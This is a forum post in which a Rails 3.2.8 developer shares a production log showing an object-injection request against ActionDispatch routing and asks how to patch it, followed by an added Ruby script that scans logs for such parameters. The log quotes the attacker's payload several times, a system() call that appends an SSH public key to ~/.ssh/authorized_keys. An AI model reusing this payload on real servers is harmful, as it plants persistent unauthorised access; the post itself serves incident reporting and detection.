ActionDispatch::Routing Vulnerability Found, has it been patched?
    <p>I noticed some unusual activity on my website a couple days ago so I decided to check out the production log. Here is what I found: </p> <pre><code>Started GET "/" for 74.219.112.36 at 2013-01-11 20:25:05 +0000 Processing by HomeController#logo as */* Parameters: {"exploit"=&gt;# &lt;ActionDispatch::Routing::RouteSet::NamedRouteCollection:0xcb7e650 @routes={:"foo; system('cd ~;mkdir .ssh;echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAtHtSi4viCaMf/KeG3mxlynWEWRPV /l4+De+BBFg/xI2ybuFenYYn4clbLFugxxr1sDNr0jBgk0iMqrLbVcdc9p DjKuymKEVbsJbOqrnNMXlUtxCefeGT1piY8Z/7tapLsr+GCXokhIcB2FPzq TtOKhnJvzgA4eZSVZsVlxTwyFM= root &gt;&gt; ~/.ssh/authorized_keys')\n__END__\n"=&gt; #&lt;OpenStruct defaults={:action=&gt;"create", :controller=&gt;"foos"}, required_parts=[], requirements={:action=&gt;"create", :controller=&gt;"foos"}, segment_keys=[:format]&gt;}, @helpers=[:"hash_for_foo; system('cd ~; mkdir .ssh;echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAtHtSi4viCaMf/KeG3mxlynWEWRPV /l4+De+BBFg/xI2ybuFenYYn4clbLFugxxr1sDNr0jBgk0iMqrLbVcdc9pDjKuymKEVbs JbOqrnNMXlUtxCefeGT1piY8Z/7tapLsr+GCXokhIcB2FPzqTtOKhnJvzgA4eZSVZsVlx TwyFM= root &gt;&gt; ~/.ssh/authorized_keys')\n__END__\n_url", :"foo; system('cd ~;mkdir .ssh;echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAtHtSi4viCaMf/KeG3mxlynWEWRPV/l4+De+BBFg /xI2ybuFenYYn4clbLFugxxr1sDNr0jBgk0iMqrLbVcdc9pDjKuymKEVbsJbOqrnNMXlUtxCefeG T1piY8Z/7tapLsr+GCXokhIcB2FPzqTtOKhnJvzgA4eZSVZsVlxTwyFM= root &gt;&gt; ~/.ssh/authorized_keys')\n__END__\n_url", :"hash_for_foo; system('cd ~;mkdir .ssh;echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAtHtSi4viCaMf/KeG3mxlynWEWRPV/l4+De+BBFg /xI2ybuFenYYn4clbLFugxxr1sDNr0jBgk0iMqrLbVcdc9pDjKuymKEVbsJbOqrnNMXlUt xCefeGT1piY8Z/7tapLsr+GCXokhIcB2FPzqTtOKhnJvzgA4eZSVZsVlxTwyFM= root &gt;&gt; ~/.ssh/authorized_keys')\n__END__\n_path", :"foo; system('cd ~;mkdir .ssh; echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAtHtSi4viCaMf/KeG3mxlynWEWRPV/l4+De+BBFg /xI2ybuFenYYn4clbLFugxxr1sDNr0jBgk0iMqrLbVcdc9pDjKuymKEVbsJbOqrnNMXlUtxCefeG 
T1piY8Z/7tapLsr+GCXokhIcB2FPzqTtOKhnJvzgA4eZSVZsVlxTwyFM= root &gt;&gt; ~/.ssh/authorized_keys')\n__END__\n_path"], @module=#&lt;Module:0xcb7e5c4&gt;&gt;} Rendered landing_users/_form.html.haml (4.7ms) Rendered home/logo.html.haml within layouts/application (7.8ms) Completed 200 OK in 11ms (Views: 10.4ms | ActiveRecord: 0.0ms) </code></pre> <p>I went on to check if their system calls worked and sure enough in ~/.ssh/authorized_keys I found the same ssh key. So this means they were able to run system calls through my rails app!!!! Thankfully my rails app isn't run under root so they did not get root access. But regardless this terrifies me. </p> <p>Has anyone encountered this exploit before? If so how did you patch it? </p> <p>My rails app is on Ubuntu 12.04, using rails version 3.2.8 and ruby version 1.9.3p125. If any other information would help out please let me know! </p> <p>I found a <a href="http://ronin-ruby.github.com/blog/2013/01/09/rails-pocs.html" rel="nofollow">blog post</a> referring to this exploit but no solutions, just how to perform it. </p>
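A log check for the pattern shown in the post above, added here as an example and not part of the original post: it scans a Rails log for requests whose `Parameters:` line contains inspected Ruby objects (`#<ClassName ...>`) where only strings, arrays and hashes are expected. The names `suspicious_requests`, `Finding` and `ALLOWED_CLASSES`, the allowlist contents, and the sample log (documentation IP addresses, payload omitted) are assumptions made for the example.

```ruby
# Added example: flag requests whose logged parameters contain inspected
# Ruby objects ("#<Foo::Bar ...>") instead of plain strings/arrays/hashes.
# Assumption: file uploads are the only objects expected in request params.
ALLOWED_CLASSES = %w[ActionDispatch::Http::UploadedFile File Tempfile StringIO].freeze

STARTED    = /\AStarted (\S+) "([^"]*)" for (\S+) at (.+)\z/
OBJECT_TAG = /#\s*<([A-Z]\w*(?:::[A-Z]\w*)*)/ # matches "#<Foo::Bar" and "# <Foo::Bar"
Finding    = Struct.new(:ip, :time, :verb, :path, :classes)

# Returns one Finding per request whose "Parameters:" line holds objects
# of a class outside ALLOWED_CLASSES.
def suspicious_requests(log_text)
  findings = []
  current = nil
  log_text.each_line do |raw|
    line = raw.strip
    if (m = STARTED.match(line))
      # Remember which request the following lines belong to.
      current = { verb: m[1], path: m[2], ip: m[3], time: m[4] }
    elsif current && line.start_with?("Parameters:")
      classes = line.scan(OBJECT_TAG).flatten.uniq - ALLOWED_CLASSES
      next if classes.empty?
      findings << Finding.new(current[:ip], current[:time], current[:verb],
                              current[:path], classes)
    end
  end
  findings
end

# Constructed sample log (not taken from a real server; payload omitted).
SAMPLE_LOG = <<~'LOG'
  Started GET "/" for 192.0.2.10 at 2013-01-11 20:25:05 +0000
  Processing by HomeController#logo as */*
    Parameters: {"exploit"=>#<ActionDispatch::Routing::RouteSet::NamedRouteCollection:0x0 @routes={}, @module=#<Module:0x0>>}
  Completed 200 OK in 11ms
  Started POST "/users" for 198.51.100.7 at 2013-01-11 20:26:10 +0000
  Processing by UsersController#create as HTML
    Parameters: {"user"=>{"name"=>"alice", "avatar"=>#<ActionDispatch::Http::UploadedFile:0x0 @tempfile=#<File:/tmp/RackMultipart>>}}
  Completed 302 Found in 20ms
LOG

if __FILE__ == $PROGRAM_NAME
  suspicious_requests(SAMPLE_LOG).each do |f|
    puts "#{f.time} #{f.ip} #{f.verb} #{f.path} -> #{f.classes.join(', ')}"
  end
end
```

A hit means the application turned request input into live Ruby objects before the controller ran; the source address and timestamp give the starting point for reviewing what else that client requested.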